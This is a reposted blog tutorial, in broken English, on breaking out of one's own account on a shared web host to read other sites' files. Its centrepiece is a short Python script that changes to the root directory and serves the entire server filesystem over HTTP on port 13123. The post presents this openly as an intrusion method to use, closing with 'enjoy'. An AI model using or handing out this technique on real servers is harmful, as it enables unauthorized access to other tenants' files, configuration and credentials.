J2TEAM Security: A must-have extension for Chrome users. Install now!

Server Bypass via Symlink - Jumping in server 2013

Server Bypass via Symlink - Jumping in server | Juno_okyo's Blog
As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.

For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.


Here we are in folder /var/www/dono and trying to go into /www/
[IMG]














No permissions to go into /www .
Before we got tired by trying the commands u must check if if python it's installed with command :


Now take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

Code:
    #!/usr/bin/env python
    import SimpleHTTPServer
    import SocketServer
    import os
     
    port = 13123
     
    if __name__=='__main__':
            os.chdir('/')
            Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
     
            httpd = SocketServer.TCPServer(("", port), Handler)
     
            print("Now open this server on webbrowser at port : " + str(port))
            print("example: http://maho.com:" + str(port))
            httpd.serve_forever()

[IMG]


Next u wil need to run the webs.py script by following command


[IMG]

open the site with port 13123
site.com:13123

[IMG]

[IMG]

[IMG]
And enjoy The symilinking :)
Follow: http://hackthedevil.blogspot.com/2013/06/server-bypass-via-symlink-jumping-in.html
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!